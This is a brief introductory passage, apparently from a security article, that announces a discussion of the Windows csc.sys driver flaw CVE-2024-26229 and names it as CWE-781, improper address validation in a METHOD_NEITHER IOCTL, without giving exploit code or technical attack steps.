Our discussion will cover the implications of this flaw, explore potential attack vectors, and suggest mitigation strategies to protect against exploits.

Understanding the technical nuances of CVE-2024-26229 is essential for cybersecurity professionals aiming to safeguard their systems against complex threats.

CWE-781: Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code in the csc.sys driver